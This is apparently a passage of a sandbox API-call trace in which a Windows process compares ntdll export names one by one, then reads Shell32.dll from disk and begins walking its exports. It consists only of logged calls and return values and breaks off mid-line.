[0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0156.727] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.728] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.850] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.851] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.851] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0156.851] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0156.851] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.851] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.851] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.851] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0156.852] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0156.852] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.853] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0156.853] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0156.854] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.855] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0156.855] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.855] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0156.856] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0156.856] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0160.716] GetProcessHeap () returned 0x450000 [0160.716] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x410c040 | out: hHeap=0x450000) returned 1 [0160.725] GetProcessHeap () returned 0x450000 [0160.725] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469260 [0160.725] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0160.725] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0160.726] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0160.726] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0160.726] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0160.726] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0160.726] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0160.726] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0160.727] GetProcessHeap () returned 0x450000 [0160.727] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1587258) returned 0x410d040 [0160.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0160.857] ReadFile (in: hFile=0x140, lpBuffer=0x410d040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410d040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0166.301] CloseHandle (hObject=0x140) returned 1 [0166.302] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0166.302] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0166.302] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0166.302] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0166.302] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0166.302] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0166.302] lstrcmpA (lpString1="CDefFolderMenu_Create2", 